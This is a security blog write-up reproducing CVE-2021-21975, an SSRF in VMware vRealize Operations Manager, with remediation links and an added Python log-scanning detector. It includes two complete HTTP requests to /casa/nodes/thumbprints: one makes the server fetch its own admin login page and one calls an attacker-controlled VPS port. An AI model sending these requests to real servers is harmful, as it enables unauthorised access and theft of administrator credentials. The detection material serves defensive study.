CVE-2021-21975: Reproducing the VMware vRealize SSRF

2021-05-07


Author: Pet3r@Timeline Sec
Disclaimer: do not use this for illegal purposes; you bear the consequences yourself.


0x01 Introduction


vRealize Operations Manager provides intelligent operations management across physical, virtual and cloud infrastructure, with visibility from applications down to storage. Using policy-based automation, operations teams automate key processes and improve IT efficiency.


0x02 Vulnerability overview


ID: CVE-2021-21975

This is a server-side request forgery (SSRF) vulnerability in the vRealize Operations Manager API that may allow an unauthenticated remote attacker to steal administrative credentials. VMware rates the vulnerability as "Important" severity, with a CVSSv3 score of 8.6.


0x03 Affected versions


VMware vRealize Operations 8.3.0, 8.2.0, 8.1.1, 8.1.0, 7.5.0

VMware Cloud Foundation 4.x, 3.x

vRealize Suite Lifecycle Manager 8.x


0x04 Environment setup


Download address for the vulnerable environment:

https://my.vmware.com/zh/group/vmware/patch#search




Visit the address generated during deployment:

https://192.168.3.6



0x05 Reproduction


Verification 1: the server makes a request to its own login page


POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.3.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsB
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36

["127.0.0.1:443/admin/login.action"]

Verification 2: listening on a VPS


POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.3.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsB
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36

["vps:6666"]
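As an added defensive example (not part of the original post, and not VMware's code): both requests above share one shape a detection rule can key on, a POST to /casa/nodes/thumbprints whose JSON body lists targets that are not plain host:port entries for the cluster's own nodes. The Python below scans constructed log lines of the form METHOD PATH BODY (a hypothetical proxy or WAF export format, not a real vROps log format) and flags targets that carry a path, point at a loopback or link-local address, or name a host outside an assumed node allow-list.

```python
import ipaddress
import json

# Constructed sample log lines: "<method> <path> <body>". This format is an
# assumption for the example, not a real vRealize Operations log format.
SAMPLE_LOG = [
    'POST /casa/nodes/thumbprints ["192.168.3.7:443"]',
    'POST /casa/nodes/thumbprints ["127.0.0.1:443/admin/login.action"]',
    'POST /casa/nodes/thumbprints ["vps:6666"]',
    'GET /ui/login.action -',
    'POST /casa/nodes/thumbprints not-json',
]

# Hypothetical allow-list of the cluster's own node addresses.
KNOWN_NODES = {"192.168.3.6", "192.168.3.7"}

THUMBPRINT_PATH = "/casa/nodes/thumbprints"


def classify_target(target: str, known_nodes=KNOWN_NODES) -> str:
    """Return 'ok' for a benign host:port entry, else a short reason string."""
    # A thumbprint lookup needs only host:port; a path component is the
    # tell-tale of a request being steered at an application endpoint.
    if "/" in target:
        return "path-in-target"
    host, sep, port = target.rpartition(":")
    if not sep or not port.isdigit():
        return "malformed"
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_link_local:
            return "loopback-or-link-local"
    except ValueError:
        pass  # a hostname rather than an IP literal; fall through to allow-list
    if host not in known_nodes:
        return "unknown-host"
    return "ok"


def scan(lines):
    """Return (line, reason) pairs for thumbprint requests worth an alert."""
    findings = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        method, path, body = parts
        if method != "POST" or path != THUMBPRINT_PATH:
            continue
        try:
            targets = json.loads(body)
        except json.JSONDecodeError:
            findings.append((line, "unparseable-body"))
            continue
        if not isinstance(targets, list):
            findings.append((line, "body-not-list"))
            continue
        for target in targets:
            reason = classify_target(str(target))
            if reason != "ok":
                findings.append((line, reason))
    return findings


if __name__ == "__main__":
    for line, reason in scan(SAMPLE_LOG):
        print(f"{reason:24s} {line}")
```

The first sample line (a known node, host:port only) produces no finding; the two request bodies from the write-up are flagged as path-in-target and unknown-host respectively, and a body that is not JSON is reported as well, since a legitimate client would not send one.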





0x06 Remediation



Follow the official advisory and upgrade or install the corresponding patch promptly.

Download link:

https://kb.vmware.com/s/article/83210

References:

https://www.vmware.com/security/advisories/VMSA-2021-0004.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975

https://www.bleepingcomputer.com/news/security/vmware-fixes-bug-allowing-attackers-to-steal-admin-credentials/


Author of this article: Timeline Sec

This article was published by a SecPulse column author; when reposting, cite the source: https://www.secpulse.com/archives/158561.html
